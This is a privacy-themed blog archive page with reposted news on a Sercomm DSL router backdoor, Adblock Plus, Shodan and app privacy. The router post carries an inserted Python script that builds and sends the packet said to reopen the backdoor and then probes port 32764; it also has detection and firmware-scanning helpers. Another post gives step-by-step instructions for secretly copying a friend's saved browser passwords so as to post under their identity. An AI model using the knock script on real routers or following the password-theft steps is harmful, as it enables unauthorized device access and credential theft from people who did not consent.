Category Archives: Privacy

DSL router patch merely hides backdoor instead of closing it

DSL router owners got an unwelcome Christmas present. Now, the same gift is back as an Easter egg. The same security researcher who originally discovered a backdoor in 24 models of wireless DSL routers has found that a patch intended to fix that problem doesn’t actually get rid of the backdoor—it just conceals it. And the nature of the “fix” suggests that the backdoor, which is part of the firmware for wireless DSL routers based on technology from the Taiwanese manufacturer Sercomm, was an intentional feature to begin with.


Back in December, Eloi Vanderbeken of Synacktiv Digital Security was visiting his family for the Christmas holiday and, for various reasons, needed administrative access to their Linksys WAG200G DSL gateway over Wi-Fi. He discovered that the device was listening on an undocumented TCP port, and after analyzing the firmware he found that the port accepted administrative commands without a password.

After Vanderbeken published his results, others confirmed that the same backdoor existed on other systems based on the same Sercomm modem, including home routers from Netgear, Cisco (both under the Cisco and Linksys brands), and Diamond. In January, Netgear and other vendors published a new version of the firmware that was supposed to close the back door.

However, that new firmware apparently only hid the backdoor rather than closing it. In a PowerPoint narrative posted on April 18, Vanderbeken disclosed that the “fixed” code concealed the same communications port he had originally found (port 32764) until a remote user employed a secret “knock”—sending a specially crafted network packet that reactivates the backdoor interface.

The packet structure used to open the backdoor, Vanderbeken said, is the same used by “an old Sercomm update tool”—a packet also used in code by Wilmer van der Gaast to “rootkit” another Netgear router. The packet’s payload, in the version of the backdoor discovered by Vanderbeken in the firmware posted by Netgear, is an MD5 hash of the router’s model number (DGN1000).

The nature of the change, which leverages the same code as was used in the old firmware to provide administrative access over the concealed port, suggests that the backdoor is an intentional feature of the firmware and not just a mistake made in coding. “It’s DELIBERATE,” Vanderbeken asserted in his presentation.

There are limitations to the use of the backdoor. Because the knock is a raw Ethernet frame rather than an IP packet, it is not routable: it has to be sent from within the local LAN or from the Internet service provider’s equipment. An ISP could, however, send it as a broadcast, re-opening the backdoor on every patched customer router at once.

Once the backdoor is switched back on, it listens for TCP/IP traffic just as the original firmware did, giving “root shell” access—allowing anyone to send commands to the router, including getting a “dump” of its entire configuration. It also allows a remote user to access features of the hardware—such as blinking the router’s lights.

Just how widely the old, new backdoor has spread is unknown. Vanderbeken said that because each firmware build is customized per manufacturer and model, the checksums differ from one build to the next, so there is no single fingerprint to look for. He has provided a proof-of-concept attack for the DGN1000, but the only way to find the vulnerability in another build is to extract the firmware’s filesystem and search it for the code that listens for the knock packet, called “ft_tool”, or for the command that reactivates the backdoor, scfgmgr -f.
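As an added example (not code from the Ars article, from Sercomm or Netgear, or from Vanderbeken’s proof of concept), the Python below builds a knock frame the way the article describes it (broadcast Ethernet frame whose payload is the MD5 of the model number), flags such frames in a LAN capture, probes TCP 32764 afterwards, and searches an extracted firmware tree for the two indicator strings named above. The EtherType 0x8888, the raw 16-byte digest as payload and the absence of any further header fields are assumptions; the real knock may differ in those details.

```python
import hashlib
import os
import socket
import struct
from typing import Iterable, List, Tuple

BACKDOOR_PORT = 32764                      # TCP port the backdoor listens on (from the article)
BROADCAST_MAC = b"\xff" * 6
KNOCK_ETHERTYPE = 0x8888                   # ASSUMPTION: EtherType of the knock frame; not stated on the page
INDICATORS = (b"ft_tool", b"scfgmgr -f")   # strings the article says to look for in the firmware


def knock_payload(model: str) -> bytes:
    """MD5 of the model number, which the article says is the knock payload.
    ASSUMPTION: the raw 16-byte digest is sent; the real PoC may encode it differently."""
    return hashlib.md5(model.encode("ascii")).digest()


def build_knock_frame(model: str, src_mac: bytes, dst_mac: bytes = BROADCAST_MAC) -> bytes:
    """Ethernet II frame: dst(6) | src(6) | ethertype(2) | payload. The broadcast
    destination mirrors the 'one frame re-enables every patched router' scenario.
    ASSUMPTION: nothing precedes the digest in the payload."""
    if len(src_mac) != 6 or len(dst_mac) != 6:
        raise ValueError("MAC addresses must be exactly 6 bytes")
    return dst_mac + src_mac + struct.pack("!H", KNOCK_ETHERTYPE) + knock_payload(model)


def is_knock_frame(frame: bytes, models: Iterable[str] = ("DGN1000",)) -> bool:
    """Detection side: true if the frame carries the knock EtherType and the MD5 of a
    known model string. Run it over raw frames from a LAN capture to spot the knock."""
    if len(frame) < 14 + 16:
        return False
    (ethertype,) = struct.unpack("!H", frame[12:14])
    if ethertype != KNOCK_ETHERTYPE:
        return False
    payload = frame[14:14 + 16]
    return any(payload == knock_payload(m) for m in models)


def find_indicators(files: Iterable[Tuple[str, bytes]]) -> List[Tuple[str, List[str]]]:
    """Report which (path, contents) pairs contain any indicator string.
    Filesystem-free so it can be driven from constructed data or from scan_firmware_tree."""
    hits = []
    for path, data in files:
        found = [ind.decode() for ind in INDICATORS if ind in data]
        if found:
            hits.append((path, found))
    return hits


def scan_firmware_tree(root: str) -> List[Tuple[str, List[str]]]:
    """Walk an extracted firmware filesystem (e.g. binwalk -e output) and return the
    files containing the indicators: the check the article describes for a build
    whose checksum is not on any known list."""
    def walk():
        for dirpath, _dirs, names in os.walk(root):
            for name in names:
                path = os.path.join(dirpath, name)
                try:
                    with open(path, "rb") as fh:
                        yield path, fh.read()
                except OSError:
                    continue
    return find_indicators(walk())


def backdoor_port_open(host: str, timeout: float = 2.0) -> bool:
    """Post-knock check: does the gateway now accept a TCP connection on 32764?"""
    try:
        with socket.create_connection((host, BACKDOOR_PORT), timeout=timeout):
            return True
    except OSError:
        return False


def send_knock(iface: str, model: str) -> int:
    """Send the knock on a Linux interface (needs CAP_NET_RAW). Only against hardware
    you own; AF_PACKET raw sockets are Linux-specific."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as sock:
        sock.bind((iface, 0))
        src_mac = sock.getsockname()[4]
        return sock.send(build_knock_frame(model, src_mac))


if __name__ == "__main__":
    # Constructed sample data, not a real capture or real firmware.
    frame = build_knock_frame("DGN1000", b"\x02\x00\x00\x00\x00\x01")
    print("knock frame:", frame.hex())
    print("detected:", is_knock_frame(frame))
    sample_fs = [("/bin/scfgmgr", b"\x7fELF...usage: scfgmgr -f\x00"),
                 ("/etc/motd", b"welcome\n")]
    print("indicators:", find_indicators(sample_fs))
```

For a real check on your own gateway: confirm port 32764 is closed with backdoor_port_open, run send_knock from a LAN host, then probe again; if the port opens, the firmware still carries the backdoor regardless of what the vendor’s release notes say.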

We attempted to reach Sercomm and Netgear for comment on the backdoor. Sercomm did not respond, and a Netgear spokesperson could not yet comment on the vulnerability. Ars will update this story as more details are made available by the device manufacturers.

(via Arstechnica.com)

Adblock Plus doesn’t block everything (+fix)

Not news to everyone, but Adblock Plus no longer blocks everything. It blocks most ads on websites and gives a relatively clean browsing experience, but some ads get through by design, and Google is one player known to pay the makers of Adblock Plus to make that happen. Adblock Plus users, of course, aren’t amused.

Fortunately there’s a fix, at least in Firefox (about:config is a Firefox feature).

Step 1. Open a new tab, type the following in the address bar and accept the warning:

about:config

Search for:

extensions.adblockplus.subscriptions_exceptionscheckbox

Double-click the entry to toggle its value from true to false, then close the tab.

Step 2. Open the Add-ons manager and select Adblock Plus.

Click “Preferences / Filter Preferences”.

Uncheck “Allow non-intrusive advertising”.

Close the screen. You’re done.

Is IE always less safe? Not always.

Suppose you want to prank a friend on a forum or another website by posting under their identity. You could try to guess their username and password: the dog’s name, their mother’s name, anything that comes to mind. Sometimes that works, but usually it doesn’t. There is an easier way.

The hole in ‘safe’ browsers
We all know that Firefox or Chrome is generally safer than the much-targeted Internet Explorer. However, IE gets one thing right that the other two don’t: the amount of effort it takes to reveal saved passwords. Here is how it works, using Firefox as the example.

Go to your friend’s house and ask if you can access the Internet from his computer. I have never been told “No”, and probably you won’t be either. Browse to your favourite webmail application and ask for a drink. While your friend is on his way to the kitchen, quickly do the following:

1. At the top of the Firefox window, click on the Edit menu and select Preferences
2. Click the Security panel.
3. Click Saved Passwords (the Password Manager will open)
4. To see the passwords which were saved, click Show Passwords.
5. Copy what you’re looking for and mail it to yourself.


Done!

You can do the same in Chrome (search for the steps). Getting all saved passwords out of IE is harder and needs extra software, which makes IE safer on at least this one count. Firefox users can blunt the trick by setting a master password, which then has to be entered before Show Passwords reveals anything.

Google For Hackers

If it can’t be found on Google, it doesn’t exist. Right? Wrong. You haven’t visited Shodan yet.

Unlike Google, which crawls the Web looking for websites, Shodan navigates the Internet’s back channels. It’s a kind of “dark” Google, looking for the servers, webcams, printers, routers and all the other stuff that is connected to and makes up the Internet. Shodan runs 24/7 and collects information on about 500 million connected devices and services each month.

Nice, but who cares? Hackers do. If you got a dollar for every device still reachable with its default username and password, you’d be rich. Shodan searchers have found control systems for a water park, a gas station, a hotel wine cooler and a crematorium. Cybersecurity researchers have even located command and control systems for nuclear power plants and a particle-accelerating cyclotron using Shodan.

Searching for “Default Password” says it all: countless companies and individuals have no clue how important even basic security is. This simple search turns up countless printers, servers and control devices that use “admin” as the user name and “1234” as the password. Many more connected systems require no credentials at all; all you need to connect is a web browser or an FTP client.


In a talk given at last year’s Defcon cybersecurity conference, independent security penetration tester Dan Tentler demonstrated how he used Shodan to find control systems for evaporative coolers, pressurized water heaters, and garage doors.

He found a car wash that could be turned on and off and a hockey rink in Denmark that could be defrosted with a click of a button. A city’s entire traffic control system was connected to the Internet and could be put into “test mode” with a single command entry. And he also found a control system for a hydroelectric plant in France with two turbines generating 3 megawatts each.

Scary stuff.

The Future Of Privacy

“We know how important it is to keep your data private. That’s why all the information you provide to us will be used for just one purpose — to help you. Information about you, your creditors and outstanding balances are never disclosed to outside parties. And don’t worry about your name, address, telephone number, or e-mail being revealed because we will never sell information about you to anyone.”

‘Apps act’ in the making

With more than 1.5 million apps now available for Android phones and Apple’s iPhone, a congressman is proposing a law that would require mobile app developers to tell users what an app’s privacy policy is: what information is shared, and how long the developer keeps it.

“Data has become the oil of the 21st century, and like any other resource, there must be common-sense rules of the road for this emerging challenge,” said Rep. Hank Johnson, D-Ga., in introducing the Application Privacy, Protection and Security Act in Congress Thursday.

“Every day millions of Americans use mobile applications to help us get through the day,” Johnson said. “But many consumers do not know their data is being collected. This privacy breach is just not 1s and 0s, it’s personal information, including our location at any given moment, our photos, messages and many of the things meant only for our friends and loved ones.”

Read the rest of the article on NBC News.